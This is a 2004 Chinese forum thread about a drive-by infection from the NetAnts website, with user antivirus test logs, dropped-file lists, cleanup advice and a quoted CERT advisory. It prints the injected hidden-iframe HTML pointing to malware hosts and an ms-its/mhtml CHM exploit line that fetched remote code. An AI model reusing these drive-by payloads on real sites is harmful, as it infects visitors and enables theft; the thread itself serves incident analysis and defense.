|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2004-04-09, 05:23 AM | #1 |
榮譽會員
|
網路螞蟻的主頁病毒事件與測試紀實
Q:
网絡螞蟻的主頁,居然墮落成這樣了。你如果不裝病毒防火牆,一定中招!系統已經打全所有修正檔了,還是不管用。 嚴重警告:如果你是諾頓用戶、你的病毒防火牆不夠新、IE修正檔沒有打全的話,千萬不要進!常見的病毒防火牆對這裡的木馬很難截殺!希望有高人出手解釋一下原理。 http://www.netants.com/gb (如果你不懂手工清理木馬,請不要隨便點擊) 系統修正檔打全了,瑞星也開了 一開網頁,結果還是中招了 瑞星發現了 FileName:0000000005124328.eml>>paypal.zip>>paypal.rtf.com FilePath:C:\WINDOWS\TEMP\rst1\Pop3 VirusName:Worm.NetSky.c Result:檔案被刪除 FileName:dl.EXE FilePath:C:\WINDOWS VirusName:Trojan.Win32.Harnig.d Result:檔案被刪除 FileName:mssys.EXE FilePath:C:\WINDOWS VirusName:TrojanDownloader.Win32.Donn.c Result:檔案被刪除 看看中招後的我:? 清理出來的木馬和相關檔案 真不知道它們是怎麼進入電腦的? WIN2003修正檔我全部打了,瑞星也開了,微軟防止IE選項被修改的修正檔也裝了,還是中招了 居然連服務都被改了,加了個木馬行程 被修改的IE 註冊表也不能避免 A: 實測....7種不同病毒軟體.... 1. Kaspersky ...成功堵截! 2. NAV CE8.1 掃瞄類型: 既時防護 掃瞄 事件: 已發現病毒! 病毒名稱: Trojan.Noupdate.B 檔案: C:\WINDOWS\reg33.exe 位置:隔離區 電腦:TLDX-05WZA6VW2S 用戶:blugman 採用的操作:隔離 成功 : 拒絕訪問 發現的日期: 2004年4月8日 10:28:47 NAV CE8.0 掃瞄類型: 既時防護 掃瞄 事件: 已發現病毒! 病毒名稱: Trojan.Noupdate.B 檔案: C:\WINDOWS\reg33.exe 位置:隔離區 採用的操作:隔離 成功 : 拒絕訪問 發現的日期: 2004年4月8日 10:30:11 已中招。 還有國際長途,撥號程序 諾頓根本攔不住. 哈哈! 用諾頓的的朋友, 現在都在重新清空COOK , 重新登錄 BBS論壇吧, 因為,都發不了貼了!! 哈哈 ........ 掃瞄類型: 既時防護 掃瞄 事件: 已發現病毒! 病毒名稱: Backdoor.Smother 檔案: E:\WINDOWS\System32\088FDD46.tmp 位置:隔離區 電腦:SHUNSHENG 用戶:SYSTEM 採用的操作:清除 失敗 : 隔離 成功 : 拒絕訪問 發現的日期: Thu Apr 08 10:39:42 2004 InternetGetConnectedState wininet.dll D39X c:\Program Files\Internet Explorer\iexplore.exe \dl.html Dial32 SOFTWARE\Microsoft\Windows\CurrentVersion\Run \dl.exe RegisterServiceProcess kernel32.dll 中了!不過手動清理dl.exe即可 清除是不太複雜,可心堣ㄤ峈A,總覺得彆扭 3. 沒中招!!!! 但是以金山也沒報警!!! 奇怪∼ 重啟動看看。 4. 現安裝Mcafee Virus Scan 7.1 上去 沒反應啊?! 用的是Mcafee Virus Scan 7.1,沒有報警,和懷疑裝了廣告過濾有關係嗎? 居然能夠使用硬碟上的exe檔案? 我可是勤打修正檔的,難道IE還有漏洞? Macfee能攔截一些,但好像也漏過了一些,c:\windows\consol32.exe的建立時間就是剛剛瀏覽網頁的時間,難道是病毒產生的?真是恐怖! kao!剛剛發現註冊表啟動項也已經被改過了,自動加入了剛剛產生的c:\windows\dl.exe和dlm.exe,而且這兩個程序已經在系統行程裡邊了!在註冊表中刪除這兩項後,病毒又會自動改回來 ,還以為自己的系統萬無一失了,沒想到還是這麼脆弱 又有新發現,系統行程裡還有個cmd.exe非常可疑,殺之!真後悔不應該以身試毒! 再作補充:C:\windows下發現以下幾個檔案,都是剛剛產生的,已確定為病毒或病毒生的檔案 secure.html securea.html secureb.html test toffel32.exe cmd32.dll winupd.exe (也在系統行程中) 再補: c:\windows\system32\mstasks1.exe, c:\windows\system32\mstasks2.exe 不出意外也應該是木馬! c:\windows\system32\config\services.exe(系統行程中有2個services,一個是正常System行程,一個估計是以當前用戶身份執行的木馬行程,此行程可借助其他工具殺掉) c:\windows\system32\config\krnldbge.dll(重新啟動後刪除) 另:IE cookie也被清空了,估計是木馬蓄意的,這樣可以截獲更多的網站密碼(譬如CCF等含金量比較高的),不知道我的密碼被木馬截獲沒有, 馬上改密碼囉! 要是密碼被盜,大夥兒給我作證哈 btw:上邊這些都是在macafee ent7.1(最新病毒碼)保護下而被感染的,其他殺毒軟體結果可能不同,歡迎補充 5. 關閉了activex 進去玩了一會 什麼都沒有發生 開啟Kaspersky 和 activex 進去玩了一會 出現四個病毒 一個插件安裝提示 四個病毒攔截三個 未遂一個 還是沒有中毒 哈哈 ! 6. 剋星監測記錄 新建檔案: C:\WINDOWS\secure.html 正在掃瞄... 密碼保護功能啟動成功,所有密碼都被動態偽裝為iparmor. 一旦發現密碼盜竊,木馬剋星將自動向您報警. 掃瞄檔案: c:\program files\iparmor\iparmor.exe mini 掃瞄檔案: c:\progra~1\symant~1\symant~1\vptray.exe 掃瞄檔案: d:\program files\綠色軟體\voleasy\voleasy.exe 掃瞄檔案: 掃瞄了 17個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 掃瞄了 19個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\securea.html 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\secureb.html 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\reg33.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\test 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\dl.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\dl.html 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\dlm.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\dlm.html 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\toffel32.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\consol32.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\msstasks.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\mstaskss.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\mssys.exe 掃瞄了 24個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 C:\WINDOWS\DLM.EXE 程序設置為自啟動 在記憶體中發現木馬. 木馬檔案名C:\WINDOWS\DL.EXE 木馬已經清除! 木馬產生日期:2004-4-7 21:04:25 修改木馬檔案名為:C:\WINDOWS\dl.exe_iparmor 請重新啟動電腦,才可以徹底清除木馬. 掃瞄了 26個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 新建檔案: C:\WINDOWS\SYSTEM32\appsys.exe 新建檔案: C:\WINDOWS\cmd32.dll 新建檔案: C:\WINDOWS\winupd.exe C:\WINDOWS\WINUPD.EXE 程序設置為自啟動 在記憶體中發現木馬. 木馬檔案名C:\WINDOWS\WINUPD.EXE 木馬已經清除! 木馬產生日期:2004-4-7 21:04:43 修改木馬檔案名為:C:\WINDOWS\winupd.exe_iparmor 請重新啟動電腦,才可以徹底清除木馬. 掃瞄了 28個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 掃瞄了 27個行程, 掃瞄結束. 沒有發現木馬,系統安全! 批發本軟體實物卡聯繫oicq:340245722 只談批發木馬剋星軟體 掃瞄了 23個行程, 掃瞄結束. 沒有發現木馬,系統安全! 7. 看了一下,AVP攔截了這個: Trojan.Win32.StartPage.es 另外彈出一個ActiveX執行對話視窗,點了「否」, 發現系統一點沒事。 結論: 1. 病毒防火牆一定要開,而且要經常昇級病毒庫 2. 對於不認識的ActiveX控件,最好不要執行它 Q: 正好刻了張光碟啟動的GHOST全自動備份還原系統光碟.給自己個理由試試 A: 呵呵∼一般中招而已,沒必要ghost吧?! …不過!你 重啟動看看!!!!!!!!!!!!!!!!!!有沒再會有中病毒現象 解決辦法:關閉dl.exe行程,刪除windows下的dl.exe、mssys.exe、dl.htm,最後刪除啟動項中的2個dl.exe即可! 最好按日期搜尋一下你WINDOWS目錄,有殺錯,無放過! 被諾頓攔截刪除的: reg33.exe 被綠綠鷹攔截刪除的: dlm.exe 被剋星攔截改名的: dl.exe winupd.exe 其它的檔案,三個軟體都沒有作處理,分別停留在Windows和system32的目錄裡 目前發現的解決辦法: 將註冊表中 HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its 改名!!! 不開任何防護,重新訪問那個頁面,除了彈出2個彈出視窗外別無異常(當然問你要不要安裝的時候一定要選否) 廣告有問題... 代碼:-------------------------------------------------------------------------------- <html> <head></head> <body onload="window.open ('http://asiafriendfinder.com/go/f148474','w1','top=50, left=0,titlebar=no,toolbar=no,width=800, height=600,directories=no,status=no,scrollbars=yes, resize=no,menubar=yes') "> <iframe src="http://c.coolshader.com/download/download.php?id=2&aid=1103" width=1 height=1> <iframe src="tool.html" width=1 height=1> </body> </html> <html> <head></head> <body> <iframe src="http://c.coolshader.com/download/download.php?id=2&aid=1103" width=1 height=1> <iframe src="tool.html" width=1 height=1> <iframe src="http://hard-virgins.com/dl/fox.php" width=1 height=1></iframe> <iframe src="lala.html" width=1 height=1></iframe> </body> </html> -------------------------------------------------------------------------------- 已經好了!主頁有提示! 剛去了一下,首頁如下 .... 最新消息 4月8日 聲明:據用戶反映,前段時間本網站的某些網頁中包含了「惡意代碼」。根據調查,發現這是由於本站點所使用的網站流量分析系統遭受攻擊所造成。為了解決這個問題,現已將該網站流量分析系統完全從本站去除。 還有...... http://www.antiy.com/cert/a040408a.htm 哈工大——安天聯合Cert小組 入侵事件通告 (2004-04-08-A Ver1.2) 網路螞蟻站點遭受攻擊的緊急通告(A級) 2004-04-08下午2:00第二次更新 2004年4月8日上午9點,安天Arrect Net預警網路上海監控站發現 著名共享軟體網路螞蟻中文站有被攻擊的可能,並已經影響到很多訪問 過該站點用戶的系統。經過積極聯繫,作者已經在下午2點將問題頁面處理完畢. 由於網路螞蟻的站點的巨大訪問量,為此我們定義此次 通告為A級。 經驗證用戶如果在此前訪問網路螞蟻中文站http://www.netants.com/gb, 如果IE沒有安裝修正檔,會被安裝木馬Trojan.Win32.StartPage.es。 經過對木馬分析特點如下: 該木馬為PE可執行檔案,長度為 6,656 字元 該木馬執行後,有如下行為:連接網站http://hard-???????.com(?是我們做的屏蔽處理) 並獲取若幹檔案,存放到%windir%下: 網路檔案 本地檔案 /progs/reg33lol.txt \reg33.exe /progs/secure1a.php \secureb.html /progs/secure64.php \securea.html /progs/secure30.php \secure.html /progs/mssysadv.txt \mssys.exe /progs/mstaskss.txt \mstaskss.exe /progs/msstasks.txt \msstasks.exe /progs/consol32.txt \consol32.exe /progs/toffel32.txt \toffel32.exe /progs/dkdial66.txt \dlm.html /progs/dkdial33.txt \dlm.exe /progs/dkdial64.txt \dl.html /progs/dkdial32.txt \dl.exe 這些檔案包括以下木馬程序: Trojan.Win32.Harnig.b Trojan.Win32.Harnig.c Trojan.Win32.Harnig.d TrojanDownloader.Win32.Donn.b ... 其中 TrojanDownloader.Win32.Donn.b 又從http://hard-???????.com下載 /progs/d22/irvk.avi 本地命名為appsys.exe 當這些木馬完全在受害電腦上執行後,會最終在系統中產生如下檔案: %windir% toffel32.exe consol32.exe mstaskss.exe mssys.exe winudp.exe cmd32.dll sdsini.ini secure.html securea.html secureb.html reg33.exe test dl.exe dl.html dlm.exe dlm.html hosts %system32% appsys.exe mstasks1.exe %system% teen.exe %Program Files%\WebSiteViewer 121299.dd 121299.dlr 121299.ico 121299.exe %windir%\Downloaded Program Files\ load.exe 其中cmd32.dll將注入記事本程序執行。 ...... 經過對網路螞蟻中文站頁面的簡單分析,曾下面內容懷疑為攻擊者新增: <IFRAME SRC="http://www.forced-??????.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME> 這一修改使網路螞蟻頁面被訪問後,會通過了連續的IFRAME SRC開啟了多個連接,其中包括: http://www.forced-??????.com/tool.html 而在tools.html中通過IFRAME SRC開啟 http://hard-???????.com/dl/fox.php fox.php中執行了一個 <script language="javascript"> document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://hard-???????.com/dl/fox/x.chm::/x.htm')); </script> ... 在與作者取得聯繫後,作者初步判斷這是網站原有流量統計站點的連接,據此判斷,應為流量統計 站點遭到攻擊,流量統計站點進行了非法活動。由於此事件的原始時間已經難以推斷,特別提醒在 4月8日下午2點以前訪問過網路螞蟻網站的用戶通過反病毒軟體或者對照本文異常檔案列表檢查是否 被木馬感染。 |
送花文章: 3,
|